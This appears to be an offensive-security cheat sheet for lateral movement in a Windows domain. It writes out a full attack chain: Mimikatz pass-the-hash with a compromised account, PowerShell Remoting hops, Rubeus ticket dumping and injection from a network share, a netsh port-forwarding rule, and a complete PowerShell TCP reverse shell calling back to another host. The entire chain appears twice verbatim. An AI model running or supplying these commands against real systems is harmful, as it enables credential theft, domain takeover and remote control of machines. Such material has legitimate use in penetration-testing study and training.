LATERAL MOVEMENT
POWERSHELL REMOTING
- Execute commands or scriptblocks
- Execute scripts from files
- Execute locally loaded function on the remote machines
- A function call within the script is used
- "Stateful" commands using Invoke-Command
- Dump credentials on a local machine
- Dump credentials on multiple remote machines
- Over pass the hash
- Invoke Mimikatz to create a token from user
FORWARDER
# RULE
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=10.10.10.10 connectport=8080
# CHECK
netsh interface portproxy show all
# RESET
netsh interface portproxy reset
KERBEROS DOUBLE HOPS - Remote ticket dumping - SMB Lateral Hosting (skill)
- You are logged in to ServerA.
- From ServerA, you start a remote PowerShell session to connect to ServerB.
- A command you run on ServerB via your PowerShell Remoting session attempts to access a resource on ServerC.
:no_entry: Access to the resource on ServerC is denied, because the credentials you used to create the PowerShell Remoting session are not passed from ServerB to ServerC.
:no_entry: Cannot encapsulate multiple psremoting session.
:no_entry: Delegation not available.
# LOGIN WITH COMPROMISED ACCOUNT
Invoke-Mimikatz -Command '"sekurlsa::pth /user:bob /domain:DOMAIN.LOCAL /ntlm:00000000000000000000000000000000 /run:powershell.exe"'
# PSREMOTE TO SERVER A
$servera = New-PSSession -ComputerName SERVERA.DOMAIN.LOCAL
Enter-PSSession -Session $servera
# PASS CREDENTIAL TO SERVER B
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
$serverb = New-PSSession -ComputerName SERVERB.DOMAIN.LOCAL -Credential $Cred
# LIST TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' klist} -Session $serverb | Select-String -Pattern Username
# DUMP TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' dump /user:targetadmin} -Session $serverb
# INJECT TICKET IN SERVER B:
Invoke-Command -ScriptBlock {& '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' ptt /ticket:B64 } -Session $serverb
# CHECK INJECTION:
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb
# RCE ON SERVER C:
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {hostname} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb
# FINAL REVERSE SHELL IN SERVER A FROM SERVER C
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient("servera",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb
# LOGIN WITH COMPROMISED ACCOUNT
Invoke-Mimikatz -Command '"sekurlsa::pth /user:bob /domain:DOMAIN.LOCAL /ntlm:00000000000000000000000000000000 /run:powershell.exe"'
# PSREMOTE TO SERVER A
$servera = New-PSSession -ComputerName SERVERA.DOMAIN.LOCAL
Enter-PSSession -Session $servera
# PASS CREDENTIAL TO SERVER B
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
$serverb = New-PSSession -ComputerName SERVERB.DOMAIN.LOCAL -Credential $Cred
# LIST TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' klist} -Session $serverb | Select-String -Pattern Username
# DUMP TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' dump /user:targetadmin} -Session $serverb
# INJECT TICKET IN SERVER B:
Invoke-Command -ScriptBlock {& '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' ptt /ticket:B64 } -Session $serverb
# CHECK INJECTION:
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb
# RCE ON SERVER C:
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {hostname} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb
# FINAL REVERSE SHELL IN SERVER A FROM SERVER C
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient("servera",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb